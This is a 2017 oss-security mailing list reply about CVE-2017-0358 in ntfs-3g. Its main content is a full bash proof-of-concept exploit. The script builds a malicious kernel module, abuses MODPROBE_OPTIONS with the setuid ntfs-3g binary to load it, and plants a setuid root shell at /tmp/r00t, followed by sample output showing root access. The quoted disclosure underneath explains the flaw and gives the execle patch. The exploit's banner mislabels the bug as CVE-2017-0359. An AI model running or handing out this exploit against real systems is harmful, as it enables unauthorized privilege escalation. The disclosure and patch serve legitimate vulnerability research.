|
Message-ID: <CAPgP4gzYwuX9bdGR6vj774=1PY7Vhv3f1aSfZehB20h0mMoiyA@mail.gmail.com>
Date: Fri, 3 Feb 2017 23:14:16 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-0358 ntfs-3g: modprobe influence
vulnerability via environment variables
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen
<kristian.hermansen+CVE-2017-0358@...il.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want
to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t;
/bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED:
linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null
1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have
root. Don't be evil :)"
/tmp/r00t
echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF
On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS)
<gcs@...ian.org> wrote:
> Hi,
>
> Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write
> NTFS driver for FUSE does not not scrub the environment before
> executing modprobe to load the fuse module. This influence the behavior
> of modprobe (MODPROBE_OPTIONS environment variable, --config and
> --dirname options) potentially allowing for local root privilege
> escalation if ntfs-3g is installed setuid. This is the case for Debian,
> Ubuntu and probably Gentoo.
>
> This problem is in the source since 2008, maybe before.
> The fix is easy, use execle instead of execl and pass NULL as
> environment variables.
> -- cut --
> --- ntfs-3g/src/lowntfs-3g.c.ref 2016-12-31 08:56:59.011749600 +0100
> +++ ntfs-3g/src/lowntfs-3g.c 2017-01-05 14:41:52.041473700 +0100
> @@ -4291,13 +4291,14 @@
> struct stat st;
> pid_t pid;
> const char *cmd = "/sbin/modprobe";
> + char *env = (char*)NULL;
> struct timespec req = { 0, 100000000 }; /* 100 msec */
> fuse_fstype fstype;
>
> if (!stat(cmd, &st) && !geteuid()) {
> pid = fork();
> if (!pid) {
> - execl(cmd, cmd, "fuse", NULL);
> + execle(cmd, cmd, "fuse", NULL, &env);
> _exit(1);
> } else if (pid != -1)
> waitpid(pid, NULL, 0);
> --- ntfs-3g/src/ntfs-3g.c.ref 2016-12-31 08:56:59.022518700 +0100
> +++ ntfs-3g/src/ntfs-3g.c 2017-01-05 15:45:45.912499400 +0100
> @@ -3885,13 +3885,14 @@
> struct stat st;
> pid_t pid;
> const char *cmd = "/sbin/modprobe";
> + char *env = (char*)NULL;
> struct timespec req = { 0, 100000000 }; /* 100 msec */
> fuse_fstype fstype;
>
> if (!stat(cmd, &st) && !geteuid()) {
> pid = fork();
> if (!pid) {
> - execl(cmd, cmd, "fuse", NULL);
> + execle(cmd, cmd, "fuse", NULL, &env);
> _exit(1);
> } else if (pid != -1)
> waitpid(pid, NULL, 0);
> -- cut --
>
> CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso,
> Debian Security Team.
>
> Regards,
> Laszlo/GCS
--
Regards,
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen
View attachment "cve-2017-0358.sh.txt" of type "text/plain" (15934 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.